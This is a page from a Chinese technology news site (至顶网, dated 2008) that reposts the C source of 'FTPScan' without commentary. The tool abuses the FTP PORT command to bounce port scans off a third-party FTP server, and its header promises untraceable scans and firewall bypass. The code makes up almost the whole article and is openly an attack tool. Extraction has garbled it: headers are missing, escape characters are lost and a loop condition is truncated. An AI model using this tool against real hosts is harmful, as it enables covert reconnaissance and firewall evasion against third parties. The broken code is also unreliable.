科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道扫描FTP服务器漏洞

扫描FTP服务器漏洞

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

** Exploits bug in FTP protocol that allows user to connect to arbritary* IP address and port.** Features: Untraceable port scans. Bypass firewalls!

2008年2月3日

关键字: 漏洞管理 系统漏洞 漏洞扫描 漏洞补丁 qq漏洞

  • 评论
  • 分享微博
  • 分享邮件

  /** FTPScan

  ** Exploits bug in FTP protocol that allows user to connect to arbritary

  * IP address and port.

  ** Features: Untraceable port scans. Bypass firewalls!

  * Example usage:

  * ftp-scan ftp.cdrom.com 127.0.0.1 0 1024

  ** This will scan IP 127.0.0.1 from ftp.cdrom.com from port 0 to 1024

  */

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  int sock;

  char line[1024];

  void rconnect(char *server)

  {

  struct sockaddr_in sin;

  struct hostent *hp;

  hp = gethostbyname(server);

  if (hp==NULL) {

  printf("Unknown host: %sn",server);

  exit(0);

  }

  bzero((char*) &sin, sizeof(sin));

  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

  sin.sin_family = hp->h_addrtype;

  sin.sin_port = htons(21);

  sock = socket(AF_INET, SOCK_STREAM, 0);

  connect(sock,(struct sockaddr *) &sin, sizeof(sin));

  }

  

  void login(void)

  {

  char buf[1024];

  

  sprintf(buf,"USER ftpn");

  send(sock, buf, strlen(buf),0);

  sleep(1);

  sprintf(buf,"PASS user@n");

  send(sock, buf, strlen(buf),0);

  }

  

  void readln(void)

  {

  int i,done=0,w;

  char tmp[1];

  

  sprintf(line,"");

  i = 0;

  while (!done) {

  w=read(sock,tmp, 1, 0);

  if (tmp[0] != 0) {

  line[i] = tmp[0];

  }

  if (line[i] == ) {

  done = 1;

  }

  i++;

  }

  line[i] = 0;

  }

  

  void sendln(char s[1024]) {

  send(sock, s, strlen(s),0);

  }

  

  #define UC(b) (((int)b)&0xff)

  

  void main(int argc, char **argv)

  {

  char buf[1024];

  int i;

  u_short sport,eport;

  register char *p,*a;

  struct hostent *hp;

  struct sockaddr_in sin;

  char adr[1024];

  

  if (argc != 5) {

  printf("usage: ftp-scan ftp_server scan_host loport hiportn");

  exit(-1);

  }

  hp = gethostbyname(argv[2]);

  if (hp==NULL) {

  printf("Unknown host: %sn",argv[2]);

  exit(0);

  }

  bzero((char*) &sin, sizeof(sin));

  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

  rconnect(argv[1]);

  /* Login anon to server */

  login();

  /* Make sure we are in */

  for (i=0; i<200; i++) {

  readln();

  if (strstr(line,"230 Guest")) {

  printf("%s",line);

  i = 200;

  }

  }

  a=(char *)&sin.sin_addr;

  sport = atoi(argv[3]);

  eport = atoi(argv[4]);

  sprintf(adr,"%i,%i,%i,%i",UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]));

  for (i=sport; i

  sin.sin_port = htons(i);

  p=(char *)&sin.sin_port;

  sprintf(buf,"nPORT %s,%i,%inLISTn",adr,UC(p[0]),UC(p[1]));

  sendln(buf);

  sprintf(line,"");

  while (!strstr(line, "150") &&!strstr(line,"425")) {

  readln();

  }

  if (strstr(line,"150")) {

  printf("%i connected.n",i);

  }

  }

  close(sock);

  }

    • 评论
    • 分享微博
    • 分享邮件
    VIP专区
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章

    业界热点:

    北京第二十六维信息技术有限公司(至顶网)版权所有. 京ICP备15039648号-7 京ICP证161336号 京公网安备 11010802021500号